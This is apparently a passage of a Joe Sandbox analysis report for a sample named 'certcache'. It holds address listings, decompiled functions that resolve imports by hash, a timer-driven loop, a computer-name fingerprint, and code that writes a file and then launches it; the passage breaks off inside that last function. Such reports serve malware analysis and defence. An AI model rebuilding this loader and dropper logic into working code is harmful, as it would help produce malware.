0x001a384c
0x001a384e
0x001a385f
0x001a3868
0x001a386e
0x001a3870
0x001a3873
0x001a3885
0x001a3891
0x001a3897
0x001a389a
0x001a3882
0x001a3882
0x001a38aa
0x001a38b6
0x001a38bc
0x001a38bf
0x001a38a7
0x001a38a7
0x001a38cf
0x001a38db
0x001a38e1
0x001a38e4
0x001a38cc
0x001a38cc
0x001a38f4
0x001a3900
0x001a3906
0x001a3909
0x001a38f1
0x001a38f1
0x001a3bad
0x001a3bbe
0x001a3bc5
0x00000000
0x001a3bcb
0x001a3bdc
0x001a3bdf
0x001a3be1
0x001a3be9
0x001a3bf8
0x001a3bfd
0x001a3c02
0x001a3c0d
0x001a3c1c
0x001a3c21
0x001a3c26
0x001a3c31
0x001a3c40
0x001a3c42
0x001a3c45
0x001a3c57
0x001a3c85
0x001a3c54
0x001a3c54
0x001a3c8e
0x001a3c98
0x001a3ca7
0x001a3caa
0x001a3cba
0x001a3cbd
0x001a3cc8
0x001a3cda
0x001a3cf0
0x001a3d08
0x001a3d0e
0x001a3d17
0x001a3cd4
0x001a3cd7
0x001a3cd7
0x001a3d2a
0x001a3d59
0x001a3d60
0x001a3d72
0x001a3d7b
0x001a3d82
0x00000000
0x00000000
0x001a3d88
0x001a3d98
0x001a3d9f
0x001a3dad
0x001a3dbd
0x001a3dc3
0x001a3dca
0x001a3dcd
0x001a3df2
0x001a3e09
0x001a3e0b
0x001a3ddb
0x001a3dde
0x001a3dec
0x001a3dec
0x001a3e14
0x001a3e6e
0x001a3e75
0x001a3e86
0x001a3e91
0x001a3e9a
0x001a3e9a
0x001a3ea3
0x001a3ea9
0x001a3ec0
0x001a3ece
0x001a3edc
0x001a3ef1
0x001a3f28
0x001a3ef3
0x001a3eff
0x001a3f0a
0x001a3f13
0x001a3f13
0x001a3eba
0x001a3eba
0x001a3f32
0x001a3f40
0x001a3f4f
0x001a3e16
0x001a3e1f
0x001a3e26
0x001a3e2f
0x001a3e34
0x001a3e3c
0x001a3e49
0x001a3e4e
0x001a3e51
0x001a3e51
0x001a3e56
0x00000000
0x001a3da1
0x001a3d69
0x001a3d6f
0x00000000
0x001a3d6f
0x00000000
0x001a3d9f
0x001a3f63
0x001a445e
0x001a3bb5
0x001a3bbb
0x00000000
0x001a3f69
0x001a3f69
0x001a3f70
0x001a3f87
0x001a3f8a
0x001a3f91
0x001a439a
0x001a43a4
0x001a43a7
0x001a43ae
0x001a43e3
0x001a43ed
0x001a43fd
0x001a440c
0x001a4420
0x001a443a
0x001a444a
0x001a4459
0x001a445b
0x00000000
0x001a43b0
0x001a43b0
0x001a43b0
0x001a43b7
0x001a43ba
0x001a5289
0x001a3f97
0x001a3f97
0x001a3f9b
0x001a4136
0x001a414c
0x001a4154
0x001a415b
0x001a4173
0x001a417a
0x001a41a2
0x001a41a8
0x001a41ab
0x001a41ae
0x001a415d
0x001a4163
0x001a416e
0x001a416e
0x001a41b7
0x001a41c0
0x001a41c2
0x001a41c8
0x001a41cb
0x001a41ce
0x001a41d0
0x00000000
0x001a41d6
0x001a41da
0x001a41fd
0x001a4229
0x001a422c
0x001a422c
0x001a4233
0x001a4236
0x001a423c
0x001a42e0
0x001a42e0
0x001a42e5
0x001a42e6
0x001a42e7
0x001a42f0
0x001a42fe
0x001a4304
0x001a4307
0x001a430a
0x001a430c
0x00000000
0x001a4312
0x001a4322
0x001a432c
0x001a4343
0x001a432e
0x001a433b
0x001a433b
0x001a4353
0x001a435a
0x001a4368
0x001a436e
0x001a4377
0x001a4379
0x001a4385
0x00000000
0x001a4385
0x001a4242
0x001a4242
0x001a4242
0x001a4248
0x001a42a7
0x001a42b3
0x00000000
0x001a424a
0x001a424a
0x001a424d
0x001a4250
0x001a4291
0x001a429f
0x001a42b6
0x001a42b8
0x00000000
0x001a42ba
0x001a42c5
0x001a42c8
0x001a42ce
0x001a42d1
0x001a42da
0x00000000
0x00000000
0x00000000
0x00000000
0x001a42da
0x001a4252
0x001a4252
0x001a4252
0x001a4259
0x001a425c
0x001a528b
0x001a4250
0x001a4248
0x001a4205
0x001a4205
0x001a4205
0x001a420c
0x001a420f
0x001a528d
0x001a41dc
0x001a41e5
0x001a41ee
0x001a41f1
0x00000000
0x001a41f1
0x001a41da
0x001a3fa1
0x001a3faa
0x001a411a
0x001a4121
0x001a412a
0x001a4133
0x00000000
0x001a3fb0
0x001a3fb0
0x001a3fc7
0x001a3fcf
0x001a3fd6
0x001a3ffa
0x00000000
0x001a3ffc
0x001a3ffc
0x001a4003
0x001a4021
0x001a402b
0x001a4031
0x001a4034
0x001a403b
0x00000000
0x00000000
0x00000000
0x001a403d
0x001a4040
0x001a4043
0x001a404c
0x00000000
0x001a404e
0x00000000
0x001a404e
0x001a404c
0x001a3fd8
0x001a3fdb
0x001a3fde
0x001a3fe5
0x001a4053
0x001a4053
0x001a4059
0x001a40b8
0x001a40c4
0x00000000
0x001a405b
0x001a405b
0x001a405e
0x001a4061
0x001a40a2
0x001a40b0
0x001a40c7
0x001a40c9
0x00000000
0x001a40cb
0x001a40d1
0x001a40d9
0x001a40df
0x001a40e2
0x001a40e9
0x00000000
0x00000000
0x00000000
0x00000000
0x001a40e9
0x001a4063
0x001a4063
0x001a4063
0x001a406a
0x001a406d
0x001a528f
0x001a4061
0x001a3fef
0x001a40ef
0x00000000
0x001a40ef
0x001a3fe5
0x001a3fd6
0x001a3faa
0x001a3f9b
0x001a3f91
0x001a3d35
0x001a3d35
0x001a3d35
0x001a3d3c
0x001a3d3f
0x001a3d3f
0x001a3d2a
0x001a3bc5
0x001a37de
0x001a37de
0x001a37de
0x001a37e5
0x001a37e8
0x001a37e8
0x001a326b
0x001a326b
0x001a3274
0x001a331b
0x001a3326
0x001a332c
0x001a3334
0x001a3339
0x00000000
0x001a333f
0x001a333f
0x001a3351
0x001a3355
0x001a34f8
0x001a3515
0x001a3520
0x001a352e
0x001a3554
0x001a3558
0x001a367b
0x001a367f
0x00000000
0x001a3685
0x001a3685
0x001a3685
0x001a368b
0x001a36ad
0x001a36ad
0x001a36b3
0x001a3711
0x001a3727
0x001a3713
0x001a3719
0x001a3719
0x001a3736
0x001a3773
0x001a3738
0x001a3746
0x001a375c
0x001a3748
0x001a374e
0x001a374e
0x001a3768
0x001a3768
0x001a377f
0x001a378b
0x001a378f
0x001a3793
0x001a37a2
0x001a37a4
0x001a37b0
0x001a37b6
0x001a37bc
0x001a37c8
0x00000000
0x001a36b5
0x001a36b8
0x001a36bb
0x001a36dd
0x001a36dd
0x001a36e4
0x001a36e7
0x001a36bd
0x001a36bd
0x001a36bd
0x001a36c4
0x001a36c7
0x001a36c7
0x001a36bb
0x001a368d
0x001a368d
0x001a368d
0x001a3694
0x001a3697
0x001a3697
0x001a368b
0x001a3568
0x001a3568
0x001a356c
0x001a360e
0x001a3617
0x001a3620
0x001a3629
0x001a362c
0x001a362e
0x00000000
0x001a3634
0x001a3634
0x001a3634
0x001a363a
0x001a3662
0x001a366a
0x001a3670
0x001a3673
0x00000000
0x001a363c
0x001a363c
0x001a363c
0x001a3643
0x001a3646
0x001a3646
0x001a363a
0x001a3572
0x001a3572
0x001a3572
0x001a3578
0x001a35d7
0x001a35e3
0x00000000
0x001a357a
0x001a357a
0x001a357d
0x001a3580
0x001a35c1
0x001a35cf
0x001a35e6
0x001a35e8
0x00000000
0x001a35ea
0x001a35f8
0x001a3601
0x001a3608
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3608
0x001a3582
0x001a3582
0x001a3582
0x001a3589
0x001a358c
0x001a358c
0x001a3580
0x001a3578
0x001a356c
0x001a3530
0x001a3530
0x001a3530
0x001a3537
0x001a353a
0x001a353a
0x001a335b
0x001a335f
0x001a343f
0x001a343f
0x001a3445
0x001a34b1
0x001a34bd
0x00000000
0x001a3447
0x001a3447
0x001a344a
0x001a344d
0x001a3499
0x001a34a4
0x001a34c0
0x001a34c2
0x00000000
0x00000000
0x00000000
0x00000000
0x001a344f
0x001a344f
0x001a344f
0x001a3456
0x001a3459
0x001a3459
0x001a344d
0x001a3365
0x001a3365
0x001a3369
0x001a340b
0x001a341a
0x001a3426
0x001a342f
0x001a3434
0x00000000
0x001a343a
0x001a34c8
0x001a334b
0x001a334e
0x00000000
0x001a334e
0x001a336f
0x001a336f
0x001a336f
0x001a3375
0x001a33d4
0x001a33e0
0x00000000
0x001a3377
0x001a3377
0x001a337a
0x001a337d
0x001a33be
0x001a33cc
0x001a33e3
0x001a33e5
0x00000000
0x001a33e7
0x001a33f5
0x001a33fe
0x001a3405
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3405
0x001a337f
0x001a337f
0x001a337f
0x001a3386
0x001a3389
0x001a3389
0x001a337d
0x001a3375
0x001a3369
0x001a335f
0x001a3355
0x001a327a
0x001a327a
0x001a327a
0x001a3280
0x001a32df
0x001a32eb
0x00000000
0x001a3282
0x001a3282
0x001a3285
0x001a3288
0x001a32c9
0x001a32d7
0x001a32ee
0x001a32f0
0x00000000
0x001a32f2
0x001a3300
0x001a3309
0x001a3315
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3315
0x001a328a
0x001a328a
0x001a328a
0x001a3291
0x001a3294
0x001a3294
0x001a3288
0x001a3280
0x001a3274
0x001a3265
0x001a318e
0x001a318e
0x001a318e
0x001a3194
0x001a31f3
0x001a31ff
0x00000000
0x001a3196
0x001a3196
0x001a3199
0x001a319c
0x001a31dd
0x001a31eb
0x001a3202
0x001a3204
0x00000000
0x001a3206
0x001a3214
0x001a321d
0x001a3224
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3224
0x001a319e
0x001a319e
0x001a319e
0x001a31a5
0x001a31a8
0x001a31a8
0x001a319c
0x001a3194
0x001a4fea
0x001a4fed
0x001a4ff0
0x001a5253
0x001a5253
0x001a525a
0x001a525d
0x001a4ff6
0x001a4ff6
0x001a4fff
0x001a50a6
0x001a50b1
0x001a50b7
0x001a50bf
0x001a50c2
0x001a50c4
0x00000000
0x001a50ca
0x001a50ca
0x001a50dc
0x001a50e0
0x00000000
0x001a50e6
0x001a50ea
0x001a51c1
0x001a51c1
0x001a51c7
0x001a5226
0x001a5232
0x00000000
0x001a51c9
0x001a51c9
0x001a51cc
0x001a51cf
0x001a5210
0x001a521e
0x001a5235
0x001a5237
0x00000000
0x00000000
0x00000000
0x00000000
0x001a51d1
0x001a51d1
0x001a51d1
0x001a51d8
0x001a51db
0x001a5275
0x001a51cf
0x001a50f0
0x001a50f0
0x001a50f4
0x001a5196
0x001a519f
0x001a51ab
0x001a51b4
0x001a51b9
0x00000000
0x001a51bf
0x001a5239
0x001a5242
0x001a524b
0x001a50d6
0x001a50d9
0x00000000
0x001a50d9
0x001a50fa
0x001a50fa
0x001a50fa
0x001a5100
0x001a515f
0x001a516b
0x00000000
0x001a5102
0x001a5102
0x001a5105
0x001a5108
0x001a5149
0x001a5157
0x001a516e
0x001a5170
0x00000000
0x001a5172
0x001a5180
0x001a5189
0x001a5190
0x00000000
0x00000000
0x00000000
0x00000000
0x001a5190
0x001a510a
0x001a510a
0x001a510a
0x001a5111
0x001a5114
0x001a5277
0x001a5108
0x001a5100
0x001a50f4
0x001a50ea
0x001a50e0
0x001a5005
0x001a5005
0x001a5005
0x001a500b
0x001a506a
0x001a5076
0x00000000
0x001a500d
0x001a500d
0x001a5010
0x001a5013
0x001a5054
0x001a5062
0x001a5079
0x001a507b
0x00000000
0x001a507d
0x001a508b
0x001a5094
0x001a50a0
0x00000000
0x00000000
0x00000000
0x00000000
0x001a50a0
0x001a5015
0x001a5015
0x001a5015
0x001a501c
0x001a501f
0x001a5279
0x001a5013
0x001a500b
0x001a4fff
0x001a4ff0
0x001a4fe4
0x001a48e8
0x00000000
0x00000000
0x00000000
0x001a4477
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001a4de4
0x00000000
0x00000000
0x00000000
0x00000000
0x001a2f58
0x001a5291
0x001a5291
0x001a5296
0x001a5297
0x00000000
0x001a5297
0x001a5521
0x001a5525

Strings

5, xrefs: 001A2F3E

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A1BE0, Relevance: .0, Instructions: 38

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A9CB8, Relevance: 36.2, APIs: 24, Instructions: 176
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E001A9CB8(void* __ecx, void* __edx, void* __edi) {
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t35;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t59;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t96 = __edi;
				L001A1830(__ecx, __edx);
				_t97 =  *(_t106 - 4);
				_t17 = LoadLibraryW(_t97);
				_push(0x1ac040);
				_push(0x30116feb);
				_push(0x21);
				L001A1B10(_t17, 0x1a1040, _t96, _t97);
				HeapFree(GetProcessHeap(), 0, _t97);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1568, 0xc);
				_t98 =  *(_t106 - 4);
				_t23 = LoadLibraryW(_t98);
				_push(0x1ac0c8);
				_push(0x1f598772);
				_push(1);
				L001A1B10(_t23, 0x1a1024, _t96, _t98);
				HeapFree(GetProcessHeap(), 0, _t98);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1574, 0xc);
				_t99 =  *(_t106 - 4);
				_t29 = LoadLibraryW(_t99);
				_push(0x1ac214);
				_push(0x41696925);
				_push(2);
				L001A1B10(_t29, 0x1a1028, _t96, _t99);
				HeapFree(GetProcessHeap(), 0, _t99);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1580, 0xc);
				_t100 =  *(_t106 - 4);
				_t35 = LoadLibraryW(_t100);
				_push(0x1ac0c4);
				_push(0x37dff52a);
				_push(1);
				L001A1B10(_t35, 0x1a100c, _t96, _t100);
				HeapFree(GetProcessHeap(), 0, _t100);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1550, 0xc);
				_t101 =  *(_t106 - 4);
				_t41 = LoadLibraryW(_t101);
				_push(0x1ac0cc);
				_push(0x14c87d5f);
				_push(1);
				L001A1B10(_t41, 0x1a10c4, _t96, _t101);
				HeapFree(GetProcessHeap(), 0, _t101);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1544, 0xc);
				_t102 =  *(_t106 - 4);
				_t47 = LoadLibraryW(_t102);
				_push(0x1ac21c);
				_push(0x786d5b64);
				_push(2);
				L001A1B10(_t47, 0x1a10c8, _t96, _t102);
				HeapFree(GetProcessHeap(), 0, _t102);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a1598, 0xc);
				_t103 =  *(_t106 - 4);
				_t53 = LoadLibraryW(_t103);
				_push(0x1ac230);
				_push(0x53973344);
				_push(0xe);
				L001A1B10(_t53, 0x1a1220, _t96, _t103);
				HeapFree(GetProcessHeap(), 0, _t103);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001A1830(0x1a158c, 0xc);
				_t104 =  *(_t106 - 4);
				_t59 = LoadLibraryW(_t104);
				_push(0x1ac224);
				_push(0x221bf2d2);
				_push(3);
				L001A1B10(_t59, 0x1a1214, _t96, _t104);
				HeapFree(GetProcessHeap(), 0, _t104);
				return L001A92F0(_t59);
			}

0x001a9cb8
0x001a9cb8
0x001a9cbd
0x001a9cc4
0x001a9cca
0x001a9ccf
0x001a9cd4
0x001a9cdd
0x001a9cef
0x001a9cfd
0x001a9cfe
0x001a9d08
0x001a9d0d
0x001a9d14
0x001a9d1a
0x001a9d1f
0x001a9d24
0x001a9d2d
0x001a9d3f
0x001a9d4d
0x001a9d4e
0x001a9d58
0x001a9d5d
0x001a9d64
0x001a9d6a
0x001a9d6f
0x001a9d74
0x001a9d7d
0x001a9d8f
0x001a9d9d
0x001a9d9e
0x001a9da8
0x001a9dad
0x001a9db4
0x001a9dba
0x001a9dbf
0x001a9dc4
0x001a9dcd
0x001a9ddf
0x001a9ded
0x001a9dee
0x001a9df8
0x001a9dfd
0x001a9e04
0x001a9e0a
0x001a9e0f
0x001a9e14
0x001a9e1d
0x001a9e2f
0x001a9e3d
0x001a9e3e
0x001a9e48
0x001a9e4d
0x001a9e54
0x001a9e5a
0x001a9e5f
0x001a9e64
0x001a9e6d
0x001a9e7f
0x001a9e8d
0x001a9e8e
0x001a9e98
0x001a9e9d
0x001a9ea4
0x001a9eaa
0x001a9eaf
0x001a9eb4
0x001a9ebd
0x001a9ecf
0x001a9edd
0x001a9ede
0x001a9ee8
0x001a9ef0
0x001a9ef4
0x001a9efa
0x001a9eff
0x001a9f04
0x001a9f0d
0x001a9f1f
0x001a9f2e

APIs

LoadLibraryW.KERNEL32(?), ref: 001A9CC4
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9CE8
HeapFree.KERNEL32(00000000), ref: 001A9CEF
LoadLibraryW.KERNEL32(?), ref: 001A9D14
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9D38
HeapFree.KERNEL32(00000000), ref: 001A9D3F
LoadLibraryW.KERNEL32(?), ref: 001A9D64
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9D88
HeapFree.KERNEL32(00000000), ref: 001A9D8F
LoadLibraryW.KERNEL32(?), ref: 001A9DB4
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9DD8
HeapFree.KERNEL32(00000000), ref: 001A9DDF
LoadLibraryW.KERNEL32(?), ref: 001A9E04
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9E28
HeapFree.KERNEL32(00000000), ref: 001A9E2F
LoadLibraryW.KERNEL32(?), ref: 001A9E54
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9E78
HeapFree.KERNEL32(00000000), ref: 001A9E7F
LoadLibraryW.KERNEL32(?), ref: 001A9EA4
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9EC8
HeapFree.KERNEL32(00000000), ref: 001A9ECF
LoadLibraryW.KERNEL32(?), ref: 001A9EF4
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9F18
HeapFree.KERNEL32(00000000), ref: 001A9F1F

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8E20, Relevance: 21.2, APIs: 14, Instructions: 155
string

C-Code - Quality: 89%

			E001A8E20(void* __ebx, void* __edx, void* __edi) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0x1ac278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x1ac280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M001A9094))) {
							case 0:
								 *0x1ac280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x1ac280 = 0;
								__eax = L001A9670();
								__eax = __eax;
								if(__eax == 0) {
									 *0x1ac280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x1ac29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x1ac280 = 0;
								 *0x1ac294 = 0x1a1270;
								 *0x1ac298 = 0x1a1270;
								__eax = L001A2310();
								__eax =  *0x1ac02c; // 0x1a12f8
								 *0x1ac26c = __eax;
								__eax =  *0x1ac030; // 0x6a
								 *0x1ac268 = 0x1ac2a8;
								 *0x1ac270 = __eax;
								 *0x1ac280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x1ac280 = 0;
								__eax = L001A8BF0( &_v28);
								__ecx =  &_v36;
								__eax = L001A8D90(__eax,  &_v36);
								__eax =  *0x1acbd0; // 0x0
								_push(0x1ac2a8);
								_v32 = __eax;
								_v44 = 0x1ac2a8;
								_v44 =  *0x1ac130();
								__eax =  *0x1ac2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = L001A8960(__edx, 0xdbba0);
									__ecx =  &_v16;
									__eax = L001AA7F0(__edx, 0xdbba0);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(L001A9FD0(__ebx, __ecx, __edx) != 0) {
										__eax =  &_v92;
										_push( &_v92);
										__eax =  &_v84;
										_push(__eax);
										__eax = L001A8560(__eax, __ecx);
										__esp = __esp + 8;
										if(__eax == 0) {
											__eax =  *0x1ac298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x1ac298 = __eax;
											 *0x1ac298 = __eax;
										} else {
											__eax = L001A99F0(__eax, __ecx, __edi);
											__ecx = 0;
											__eax = E001A88F0(0);
											__ecx = 0;
											__eax = E001AA7A0(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(L001AA1D0( &_v92, __edx) != 0) {
												__eax = L001A1750(__edi);
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = L001A9AE0(__eax, _v76, __edx);
												}
												__eax = L001A1750(__edi);
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = L001A89D0(__edx, __esi);
													__esi = 0;
												}
												__eax = L001A1750(__edi);
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = L001AA860(__edx, __esi);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x1ac280 = 4;
								 *0x1ac278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x001a8e2a
0x001a8e36
0x001a908d
0x001a9091
0x001a8e3c
0x001a8e3c
0x001a8e41
0x001a8e45
0x00000000
0x001a8e4b
0x001a8e4b
0x00000000
0x001a8e52
0x001a8e60
0x00000000
0x00000000
0x001a8e63
0x001a8e6d
0x001a8e72
0x001a8e75
0x001a8e91
0x001a8e9b
0x001a8e9f
0x001a8e77
0x001a8e78
0x00000000
0x001a8e7e
0x001a8e84
0x001a8e8a
0x001a8e8e
0x001a8e8e
0x001a8e78
0x00000000
0x00000000
0x001a8ea2
0x001a8eac
0x001a8eb6
0x001a8ec0
0x001a8ec5
0x001a8eca
0x001a8ecf
0x001a8ed4
0x001a8ede
0x001a8ee3
0x001a8eed
0x001a8ef1
0x00000000
0x00000000
0x001a8ef4
0x001a8ef8
0x001a8f02
0x001a8f07
0x001a8f0b
0x001a8f10
0x001a8f15
0x001a8f1a
0x001a8f1e
0x001a8f2c
0x001a8f30
0x001a8f38
0x001a8f40
0x001a8f40
0x001a8f44
0x001a8f49
0x001a8f4e
0x001a8f52
0x001a8f57
0x001a8f5b
0x001a8f66
0x001a8f6c
0x001a8f70
0x001a8f71
0x001a8f75
0x001a8f76
0x001a8f7b
0x001a8f80
0x001a9001
0x001a9006
0x001a900b
0x001a900e
0x001a901d
0x001a8f82
0x001a8f82
0x001a8f87
0x001a8f89
0x001a8f8e
0x001a8f90
0x001a8f95
0x001a8f99
0x001a8fa4
0x001a8fa6
0x001a8fab
0x001a8fb1
0x001a8fb3
0x001a8fb7
0x001a8fb7
0x001a8fbc
0x001a8fc1
0x001a8fc7
0x001a8fc9
0x001a8fcd
0x001a8fd2
0x001a8fd2
0x001a8fd4
0x001a8fd9
0x001a8fdf
0x001a8fe1
0x001a8fe5
0x001a8fea
0x001a8fea
0x001a8fdf
0x001a8ff9
0x001a8ff9
0x001a902f
0x001a902f
0x001a9042
0x001a9055
0x001a905b
0x001a9063
0x001a906d
0x001a906f
0x001a907b
0x001a9087
0x00000000
0x00000000
0x001a8e4b
0x001a8e45
0x00000000

APIs

GetTickCount.KERNEL32 ref: 001A8E2A
SetEvent.KERNEL32 ref: 001A8E84
lstrlen.KERNEL32 ref: 001A8F26
HeapFree.KERNEL32(00000000), ref: 001A9087

Part of subcall function 001A88F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001A8908

Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC

GetProcessHeap.KERNEL32(00000000,?), ref: 001A8FF2
HeapFree.KERNEL32(00000000), ref: 001A8FF9
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9028
HeapFree.KERNEL32(00000000), ref: 001A902F
GetProcessHeap.KERNEL32(00000000,?), ref: 001A903B
HeapFree.KERNEL32(00000000), ref: 001A9042
GetProcessHeap.KERNEL32(00000000,?), ref: 001A904E
HeapFree.KERNEL32(00000000), ref: 001A9055
GetTickCount.KERNEL32 ref: 001A9063
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9080

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A94C1, Relevance: 19.6, APIs: 13, Instructions: 76

APIs

_snwprintf.NTDLL ref: 001A94DE
GetProcessHeap.KERNEL32(00000000,?), ref: 001A94EA
HeapFree.KERNEL32(00000000), ref: 001A94F1
_snwprintf.NTDLL ref: 001A950F
GetProcessHeap.KERNEL32(00000000,?), ref: 001A951B
HeapFree.KERNEL32(00000000), ref: 001A9522
CreateFileW.KERNEL32(001AC9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001A953C
GetComputerNameW.KERNEL32(?,?), ref: 001A95B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001A9601
RtlAllocateHeap.NTDLL(00000000), ref: 001A9608
_snprintf.NTDLL ref: 001A9642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 001A964E
HeapFree.KERNEL32(00000000), ref: 001A9655

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A9AF1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58

APIs

memset.NTDLL ref: 001A9AF9
memset.NTDLL ref: 001A9B07
GetLastError.KERNEL32 ref: 001A9B28
GetTickCount.KERNEL32 ref: 001A9B37
_snwprintf.NTDLL ref: 001A9B8E
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9B9A
HeapFree.KERNEL32(00000000), ref: 001A9BA1
GetLastError.KERNEL32 ref: 001A9BB8

Strings

D, xrefs: 001A9B10

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
processfile

C-Code - Quality: 56%

			E001AA658() {
				void* _t22;
				void* _t24;
				void* _t26;

				WriteFile();
				CloseHandle(_t24);
				memset(_t26 - 0x5c, 0, 0x44);
				 *(_t26 - 0x5c) = 0x44;
				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
					CloseHandle( *(_t26 - 0x18));
